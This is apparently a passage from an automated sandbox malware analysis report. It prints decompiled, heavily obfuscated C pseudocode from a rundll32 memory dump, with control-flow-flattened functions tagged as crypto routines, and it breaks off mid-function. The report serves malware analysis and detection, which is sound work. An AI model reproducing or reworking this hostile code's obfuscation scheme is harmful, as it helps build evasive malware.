0x0036064d
0x00360655
0x0036065d
0x00360669
0x0036066e
0x00360674
0x0036067c
0x00360684
0x0036068c
0x00360697
0x0036069f
0x003606aa
0x003606b2
0x003606b7
0x003606c4
0x003606c5
0x003606cc
0x003606d0
0x003606d8
0x003606e0
0x003606e5
0x003606f3
0x003606f7
0x003606ff
0x0036070a
0x00360715
0x00360720
0x00360720
0x00360722
0x00360723
0x00360723
0x00360723
0x00360728
0x00360728
0x0036072e
0x0036098a
0x00360991
0x00000000
0x00360734
0x0036073a
0x003608ea
0x003608f3
0x003608fb
0x00360901
0x0036095c
0x00360967
0x0036096a
0x0036096f
0x00360993
0x00360995
0x0036099a
0x00360740
0x00360742
0x003608ca
0x003608d1
0x003608d4
0x003608d6
0x003608de
0x00000000
0x00360748
0x0036074e
0x00360831
0x0036083c
0x00360840
0x00360855
0x00360856
0x0036085b
0x0036085e
0x00360720
0x00360720
0x00360722
0x00000000
0x00360722
0x00360754
0x0036075a
0x00360811
0x00360817
0x0036081f
0x0036081f
0x00360822
0x00000000
0x00000000
0x0036081c
0x0036081c
0x0036081c
0x00360824
0x00360827
0x00000000
0x00360760
0x00360760
0x00360766
0x0036076c
0x00360778
0x00360786
0x00360794
0x003607cb
0x003607d8
0x003607dc
0x003607ea
0x003607ff
0x00360804
0x00360807
0x00360720
0x00360720
0x00360722
0x00360723
0x00360723
0x00000000
0x00360723
0x00360720
0x00360766
0x0036075a
0x0036074e
0x00360742
0x0036073a
0x0036099b
0x0036099b
0x003609b4
0x003609b4
0x00360723

Strings

E+A, xrefs: 00360169
pw, xrefs: 0036043C
g, xrefs: 003604A1
Agz, xrefs: 003602A4
DWK, xrefs: 0036040A

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Agz$DWK$E+A$g$pw
API String ID: 0-1474679353
Opcode ID: 596873dc0cbc9dd4dd22ee837152c49ab8925f529988e5f1a34c7b197a214d67
Instruction ID: f4ce8b980661b938d7647da566e4b5e9a82c9f9aa35b7b42792f737f2209f965
Opcode Fuzzy Hash: 596873dc0cbc9dd4dd22ee837152c49ab8925f529988e5f1a34c7b197a214d67
Instruction Fuzzy Hash: ED32127250C3808FD369CF25C94AA8BFBF2BBC4748F10891DE1998A261D7B59949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0034F09B Relevance: 6.6, Strings: 5, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E0034F09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0035DA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E0034B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E00348969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E003447CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E0035DCF7(_v2620, 0x341308, _t515),  &_v1560, _v2720, _v2688);
							E0034A8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E0034EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E003546BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E003447CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E0035DCF7(_v2708, 0x341348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E0034A8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E0034AB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}

0x0034f09b
0x0034f0a1
0x0034f0ae
0x0034f0b6
0x0034f0c1
0x0034f0c9
0x0034f0d1
0x0034f0d9
0x0034f0e1
0x0034f0e9
0x0034f0fa
0x0034f0fc
0x0034f101
0x0034f106
0x0034f110
0x0034f115
0x0034f11b
0x0034f123
0x0034f136
0x0034f139
0x0034f140
0x0034f14b
0x0034f153
0x0034f160
0x0034f164
0x0034f16c
0x0034f174
0x0034f179
0x0034f185
0x0034f18a
0x0034f190
0x0034f198
0x0034f1a4
0x0034f1a9
0x0034f1af
0x0034f1b4
0x0034f1bc
0x0034f1c4
0x0034f1cc
0x0034f1d4
0x0034f1dc
0x0034f1e7
0x0034f1f2
0x0034f1fd
0x0034f205
0x0034f20a
0x0034f213
0x0034f216
0x0034f21a
0x0034f222
0x0034f22a
0x0034f234
0x0034f238
0x0034f240
0x0034f24d
0x0034f258
0x0034f263
0x0034f26b
0x0034f276
0x0034f27b
0x0034f281
0x0034f289
0x0034f291
0x0034f29c
0x0034f2a7
0x0034f2b2
0x0034f2ba
0x0034f2bf
0x0034f2c7
0x0034f2d4
0x0034f2d7
0x0034f2db
0x0034f2e8
0x0034f2ec
0x0034f2f4
0x0034f307
0x0034f30e
0x0034f319
0x0034f321
0x0034f326
0x0034f32e
0x0034f336
0x0034f346
0x0034f34a
0x0034f34f
0x0034f357
0x0034f369
0x0034f36e
0x0034f377
0x0034f382
0x0034f38d
0x0034f398
0x0034f3a3
0x0034f3af
0x0034f3b4
0x0034f3ba
0x0034f3c2
0x0034f3ca
0x0034f3d2
0x0034f3dd
0x0034f3e8
0x0034f3f3
0x0034f3fb
0x0034f408
0x0034f409
0x0034f40d
0x0034f415
0x0034f41d
0x0034f42b
0x0034f42f
0x0034f437
0x0034f43e
0x0034f44b
0x0034f453
0x0034f458
0x0034f460
0x0034f468
0x0034f470
0x0034f478
0x0034f480
0x0034f488
0x0034f490
0x0034f498
0x0034f4a0
0x0034f4a8
0x0034f4b0
0x0034f4b8
0x0034f4c3
0x0034f4ce
0x0034f4d9
0x0034f4e1
0x0034f4e6
0x0034f4ee
0x0034f4f6
0x0034f4fe
0x0034f50c
0x0034f50f
0x0034f513
0x0034f51b
0x0034f523
0x0034f52b
0x0034f530
0x0034f538
0x0034f543
0x0034f54b
0x0034f556
0x0034f561
0x0034f569
0x0034f574
0x0034f587
0x0034f58e
0x0034f599
0x0034f5a1
0x0034f5a6
0x0034f5ae
0x0034f5b6
0x0034f5c3
0x0034f5c7
0x0034f5cf
0x0034f5d7
0x0034f5df
0x0034f5e7
0x0034f5ef
0x0034f5f7
0x0034f602
0x0034f60a
0x0034f611
0x0034f61c
0x0034f624
0x0034f62c
0x0034f630
0x0034f638
0x0034f640
0x0034f648
0x0034f650
0x0034f658
0x0034f663
0x0034f66b
0x0034f676
0x0034f67e
0x0034f686
0x0034f68e
0x0034f696
0x0034f6a4
0x0034f7b0
0x00000000
0x0034f6aa
0x0034f6aa
0x0034f6b0
0x0034f883
0x0034f883
0x0034f889
0x00000000
0x00000000
0x0034f6b6
0x0034f6d2
0x0034f700
0x0034f70a
0x0034f70f
0x0034f71b
0x0034f762
0x0034f777
0x0034f795
0x0034f799
0x0034f79e
0x0034f7a3
0x0034f7a9
0x00000000
0x0034f7a9
0x0034f7a3
0x0034f6b0
0x0034f898
0x0034f898
0x0034f7ba
0x0034f7c8
0x0034f7cf
0x0034f7de
0x0034f7df
0x0034f7e4
0x0034f7f0
0x0034f837
0x0034f843
0x0034f849
0x0034f858
0x0034f85c
0x0034f85e
0x0034f85f
0x0034f861
0x0034f863
0x0034f86e
0x0034f875
0x0034f876
0x0034f87b
0x0034f87e
0x00000000

Strings

Q0, xrefs: 0034F3F3
5, xrefs: 0034F44B
<!, xrefs: 0034F650
kD, xrefs: 0034F398
), xrefs: 0034F574

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: kD$)$5$<!$Q0
API String ID: 0-101729813
Opcode ID: 0263716f4d369a468bbc0145c4ca48f3dab5ac864c4c8053fb91ea64ec1f18a3
Instruction ID: 916821006a64b5a550a971c0fdd394ebd70670315aba65716b4df605b3409f0e
Opcode Fuzzy Hash: 0263716f4d369a468bbc0145c4ca48f3dab5ac864c4c8053fb91ea64ec1f18a3
Instruction Fuzzy Hash: A01200715083809FD3A9CF21C48AA8BFBE2FBC4758F50891DE5D98A260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 003566CA Relevance: 6.5, Strings: 5, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003566CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E00355C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E0035DCF7(_v1084, 0x341060, __eflags);
							_t264 = E0035D25E(_v1120);
							_t282 =  *0x363e10; // 0x0
							_t265 =  *0x363e10; // 0x0
							E0035453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E0034A8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E0035DCF7(_v1136, 0x341000, _t319);
									_t289 =  *0x363e10; // 0x0
									_t306 =  *0x363e10; // 0x0
									E003447CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E0034A8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E003613AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}

0x003566ca
0x003566d0
0x003566d7
0x003566df
0x003566e7
0x003566ef
0x003566f7
0x003566ff
0x00356711
0x00356716
0x0035671c
0x00356724
0x00356729
0x00356731
0x00356736
0x0035673e
0x0035674b
0x0035674c
0x00356750
0x00356758
0x00356760
0x00356768
0x00356770
0x00356778
0x00356780
0x00356788
0x00356790
0x00356798
0x003567a0
0x003567a8
0x003567b0
0x003567b8
0x003567c0
0x003567c8
0x003567d0
0x003567d8
0x003567e0
0x003567e8
0x003567ed
0x003567f2
0x003567f7
0x003567ff
0x00356807
0x0035680f
0x00356814
0x0035681c
0x00356824
0x0035682c
0x00356834
0x0035683c
0x00356844
0x00356851
0x00356855
0x0035685a
0x00356862
0x0035686a
0x00356872
0x0035687a
0x00356888
0x0035688c
0x00356894
0x0035689c
0x003568a4
0x003568ac
0x003568b4
0x003568bc
0x003568c4
0x003568c9
0x003568ce
0x003568d8
0x003568e0
0x003568e8
0x003568ed
0x003568f2
0x003568fa
0x00356902
0x0035690a
0x00356912
0x0035691a
0x00356922
0x0035692a
0x00356932
0x0035693a
0x00356942
0x0035694a
0x00356952
0x0035695a
0x00356962
0x00356967
0x0035696f
0x00356977
0x00356986
0x00356989
0x0035698d
0x00356995
0x0035699d
0x003569a5
0x003569ad
0x003569b5
0x003569ba
0x003569bf
0x003569c7
0x003569d7
0x003569db
0x003569e3
0x003569eb
0x003569f3
0x003569fb
0x00356a08
0x00356a09
0x00356a0d
0x00356a15
0x00356a22
0x00356a26
0x00356a2e
0x00356a36
0x00356a3e
0x00356a4c
0x00356a50
0x00356a60
0x00356a74
0x00356a74
0x00356a82
0x00356b0d
0x00356b16
0x00356b1e
0x00356b2f
0x00356b34
0x00356b47
0x00356b6a
0x00356b7c
0x00356b81
0x00356b84
0x00000000
0x00356a88
0x00356a8e
0x00356b06
0x00000000
0x00356a90
0x00356a90
0x00356a92
0x00356a98
0x00356aa1
0x00356aa9
0x00356aba
0x00356ad2
0x00356ae5
0x00356af7
0x00356afc
0x00356aff
0x00000000
0x00356aff
0x00356a92
0x00356a8e
0x00000000
0x00356a82
0x00356b8e
0x00356b99
0x00356b9a
0x00356ba9
0x00356bae
0x00356bb1
0x00356bb3
0x00356bb3
0x00356bb3
0x00356bc5

Strings

?c3, xrefs: 00356A3E
yw, xrefs: 0035691A
a@, xrefs: 003568FA
Md, xrefs: 003568E0
<E, xrefs: 0035682C

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <E$?c3$Md$a@$yw
API String ID: 0-2084988834
Opcode ID: d811c18aff756c7ed0a1a9165512d31741b16666f2cbaea53078ddb84d96f263
Instruction ID: 3a8246dffadf74ddef011e0bb7ef843103fe53cd25ed657b1cb2c90bb7f0e4da
Opcode Fuzzy Hash: d811c18aff756c7ed0a1a9165512d31741b16666f2cbaea53078ddb84d96f263
Instruction Fuzzy Hash: 41C120B24083809FD369CF25D58A81BBBF2FB94758F508A1DF5A696260D3B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00350001 Relevance: 6.4, Strings: 5, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00350001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E003520B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
